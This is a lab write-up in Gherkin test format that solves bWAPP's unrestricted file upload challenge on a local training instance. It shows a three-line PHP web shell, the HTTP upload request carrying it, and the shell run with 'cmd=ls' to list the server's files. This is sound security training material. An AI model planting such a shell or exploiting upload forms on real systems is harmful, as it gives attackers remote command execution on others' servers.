# language: en

Feature: Unrestricted File Upload
  From system bWAPP
  From the A7 - Missing Functional Level Access Control
  With Low security level

  Background:
    Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
    And I am using Firefox 52.7.3 (64-bit)
    And I am running Burp Suite Community edition v1.7.30
    Given the following
    """
    URL: http://localhost/bWAPP/unrestricted_file_upload.php
    Message: Unrestricted File Upload
    Details:
    - Please upload an image
    - File selector + upload button
    Objective: Upload an unrestricted file
    """

  Scenario: Unrestricted file upload
    Given the upload form
    Then I make a basic test
    And I upload a regular image
      """
      # unrestricted_file_upload.php
      POST /bWAPP/unrestricted_file_upload.php HTTP/1.1
      Host: 192.168.75.128
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://192.168.75.128/bWAPP/unrestricted_file_upload.php
      Cookie: security_level=0; PHPSESSID=a7b20ec7185af9e26737048be148e744
      Connection: close
      Upgrade-Insecure-Requests: 1
      Content-Type: multipart/form-data; boundary=-------------------------
      Content-Length: 61165

      -----------------------------1231230801044504573221905989
      Content-Disposition: form-data; name="file"; filename="image.png"
      Content-Type: image/png

      # Response
      # The image has been uploaded here.
      # I click the link and it takes me to the image i uploaded
      # If it doesn't check for the content of the file
      # neither the extension, i can upload anything.
      """
    Then I upload a php shell
      """
      # shell.php
      <?php
      $cmd=$_GET['cmd'];
      echo system($cmd);
      ?>
      """
    And I check at the request
      """
      # Upload Request
      POST /bWAPP/unrestricted_file_upload.php HTTP/1.1
      Host: 192.168.75.128
      Content-Type: multipart/form-data;
      boundary=---------------------------6847792114688596881722399832
      Content-Length: 507

      -----------------------------6847792114688596881722399832
      Content-Disposition: form-data; name="file"; filename="shell.php"
      Content-Type: application/x-php

      <?php
      $cmd=$_GET['cmd'];
      echo system($cmd);
      ?>
      """
    Then I look at it
      """
      # http://192.168.75.128/bWAPP/images/shell.php
      Warning: system() [function.system]: Cannot execute a
      blank command in /var/www/bWAPP/images/shell.php on line 5

      # Let's invoke the shell
      # http://192.168.75.128/bWAPP/images/shell.php?cmd=ls
      bee_1.png bg_1.jpg bg_2.jpg bg_3.jpg blogger.png captcha.png
      cc.png evil_bee.png facebook.png favicon.ico favicon_drupal.ico
      free_tickets.png image.png linkedin.png mk.png mme.png netsparker.gif
      """

